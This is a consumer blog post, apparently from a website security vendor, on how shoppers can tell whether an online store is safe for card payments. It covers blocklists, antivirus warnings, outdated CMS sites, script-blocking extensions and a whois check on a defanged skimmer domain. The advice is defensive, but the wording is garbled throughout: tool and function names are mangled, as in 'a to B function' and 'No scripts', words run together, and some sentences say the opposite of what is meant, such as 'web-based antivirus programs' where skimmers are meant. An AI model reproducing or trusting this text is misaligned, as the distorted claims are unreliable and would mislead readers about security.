How do I know if a website is safe to use my credit card?

With regular news stories about corporate hacks, database breaches, internet breaking vulnerabilities and online credit card theft, internet users are rightly anxious to make purchases. online for fear that their personal information will be compromised by attackers. But where does legitimate worry end and outright paranoia begin? In this article, I’ll try to take some of that anxiety away and give users the knowledge to shop safely online.

It’s a big creepy canvas

In a two-part precedent series On this blog, we’ve detailed the general overview of the web-based e-commerce environment and explained why some websites are more prone to credit card theft than others.

E-commerce sites can be summed up in two main categories: e-commerce sites managed by dedicated companies and independent sites managed by the site administrators themselves. The first category includes larger and well-known platforms like Amazon, Shopify, Etsy and others. The latter includes all websites where the store has created its own e-commerce website, usually on shared or VPS hosting. It is in this latter category of freelance websites that the overwhelming majority of credit card thefts occur. You can check out the series of articles I linked above for more context on why.

If you are unsure how to tell whether or not a website is using a managed platform, our SiteCheck Tool can be a very useful friend! If you scan a website and navigate to the “JavaScript included» field of More details section, it can give you relevant information. Here’s an example of how to determine if a website is using Shopify:

If you’re nervous about putting your credit card information in a checkout page, you don’t have to worry if they use a big, well-known platform like Shopify (assuming your computer/ browser is not infected – make sure you are using antivirus software!). If you want to be on the safe side in a family e-commerce store, let’s explore some red flags you can watch out for.

Blocklist Resources

Credit card and online security companies take credit card fraud very seriously. They have dedicated teams of people working full time to make sure their customers are as protected from threats as possible. Credit card companies will collect data fromcommon purchase pointsfor cases of known fraud and often contact the administrator of the website in question to inform them of the threat. In severe cases, website administrators can be fined thousands of dollars for allowing their websites to come under attack. Taking website security seriously is of utmost importance if you are running such a store.

Authorities such as Google will maintain a blacklist of websites that are known distributors of malware or contain active threats loaded from malicious domains. Websites that violate Google’s security policies will quickly find themselves blocked.

If you see such a warning when trying to visit a website or payment page, I advise you not to continue. There are many other vendors (including ourselves) that maintain a list of known attack websites. You can always connect the online store in question to a website such as VirusTotal to see if it is reported by any vendors.

It should be mentioned that some providers are much more reputable than others. Just because a vendor reports the site doesn’t necessarily mean it’s infected. Some blocklist warnings will also be left by a previous infection that has already been resolved, so this is not a panacea, just something to beware of!

Antivirus programs

Security applications that actively monitor and protect your computer from malware and other threats will also often intercept suspicious traffic occurring in your web browser.

Different antivirus programs work in different ways, but they all try to protect you as much as possible. With the recent increase in web-based antivirus programs, credit card theft antivirus programs have actively improved their signatures and detection of these threats.

If you receive a warning/notification from your anti-virus program, you should not proceed with the purchase and it is advisable to inform the website owner of the warning.

Pro Tip: It’s always a good idea to provide a helpful screenshot when reporting issues!

Poorly maintained websites

Most often (but not always), the websites that tend to be the most affected by credit card theft malware are usually those that are not properly maintained. Although it’s not always possible to tell from the outside, sometimes you can! Our SiteCheck The tool can identify websites that are running outdated versions of WordPress or other CMS platforms. Other tools such as MageReport (specific to Magento sites) will also attempt to determine if the site is missing any security patches:

Websites that lack security patches or use outdated CMS installations should be avoided out of caution.

Suspicious javascript

If you want to dig a little deeper, you can also put on your security analyst hat and use some of the same tools we use to identify threats on e-commerce websites. Two such tools that I would recommend are No scripts (for FireFox) and ScriptSafe (for Chrome).

These browser extensions are invaluable tools when examining the JavaScript that loads on a website. They also do a wonderful job of making the web browsing experience online. much more securealthough they are a bit boring to get used to at first.

When you visit an e-commerce website, you can check if resources are loaded from suspicious domains.

Websites frequently grab javascript and other content from third-party domains and it takes some experience to know what belongs and what doesn’t. If you are unsure, you can connect the domains to VirusTotal and see if there are any vendors flagging them as suspicious or malicious.

Here’s an example of a known credit card exfiltration domain that throws multiple warnings:

You can also run a who is command on a domain if you are unsure. Malicious domains tend to have a short lifecycle, so a recent registration date is a red flag:

$ whois  cdn-bootstrapcdn[.]com   
  Domain Name: CDN-BOOTSTRAPCDN[.]COM
  Registry Domain ID: 2616864123_DOMAIN_COM-VRSN
  Registrar WHOIS Server: whois.namesilo.com
  Registrar URL: http://www.namesilo.com
  Updated Date: 2021-09-17T19:20:07Z
  Creation Date: 2021-06-02T20:48:51Z
  Registry Expiry Date: 2022-06-02T20:48:51Z

Malware is sneaky by design, and its authors go to great lengths to disguise and otherwise obfuscate it. Here is an example of credit card theft JavaScript injection pretending to be the popular website analytics service HotJar:

At first glance this seems benign, until you notice the use of the a to B function and some sneaky base64 encoded strings. Once the obfuscation is removed and JavaScript is executed, it is effectively credit card skimming malware loading resources from a malicious domain. filetech[.]X Y Z

It is worth mentioning that credit card theft malware can be both browser side (JavaScript) and on the server side (PHP). JavaScript malware can be detected by your antivirus program and by inspecting the front-end webpage. Server-side PHP malware, on the other hand, can not! It works surreptitiously in the background and can siphon credit card details without any trace. Without access to the backend of the website, you only see half the story.

Prevention is better than cure

For an average web user, there’s really no way to know for sure if a website is safe to enter your credit card details. Although users should beware, that’s not necessarily a reason to completely cut themselves off from the e-commerce world.

Do your best to exercise caution. Avoid websites that can be determined to be poorly maintained or blocked by reputable providers.

Credit card companies will do their best to block suspicious transactions, but be aware that once a credit card number is stolen, it’s usually only a matter of days before it’s gone. sold on the black market. In the final analysis, your best bet is to regularly check your credit card statement for transactions you didn’t make yourself and contact your credit card company immediately if you see anything suspicious.

If you own an e-commerce website, consider signing up for our website security services to help protect your website from attackers and credit cards

Sherry J. Basler